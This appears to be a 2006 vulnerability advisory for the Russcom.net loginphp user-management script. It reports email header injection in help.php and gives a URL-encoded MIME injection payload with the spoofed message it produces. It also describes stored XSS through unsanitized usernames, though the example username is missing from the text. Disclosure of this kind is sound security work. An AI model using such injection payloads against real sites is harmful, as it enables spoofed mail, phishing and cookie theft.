Russcom.net Loginphp multiple vulnerabilties=0D
=0D
Discovered by: Nomenumbra=0D
Date: 5/2/2006=0D
impact:moderate (privilege escalation,possible defacement)=0D
=0D
Russcom.net's loginphp script is a small usermanagement script:=0D
Users can sign up for a username which they can use to login to the password protected main page.=0D
The administrator can delete users. He can also edit the main page.=0D
This script includes the members and help pages.=0D
=0D
It is possible to send spoofed mails in MIME-format trough help.php due to improper filtering:=0D
=0D
The php mail function is used like:=0D
=0D
mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]); =0D
=0D
By following the rules provided in RFC 822 we can inject a message in MIME-format like this:=0D
=0D
haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0A=0D 
 My%20Message.%0A--frog--=0D
=0D
to get this message:=0D
=0D
To: recip@ient.xxx=0D 
Subject: Visit www.website.xxx !=0D 
From: haxor@attack.xxx=0D 
 Content-Type:multipart/mixed; boundary=frog;=0D
 --frog=0D
 Content-Type:text/html=0D
 =0D
 My Message.=0D
 --frog--=0D
 =0D
 Hello,=0D
A friend thought you might want to see this page : www.website.xxx.=0D 
 Bye Bye=0D
=0D
for more information: http://www.securephpwiki.com/index.php/Email_Injection=0D 
=0D
In the register function you can subscribe with the following username (for example):=0D
=0D
 the input isn't sanitized so you can insert any XSS (30 char max) and anyone who will visit the page displaying=0D
all users will get XSS'd (potentially cookies stolen).=0D
=0D
Nomenumbra/[0x4F4C]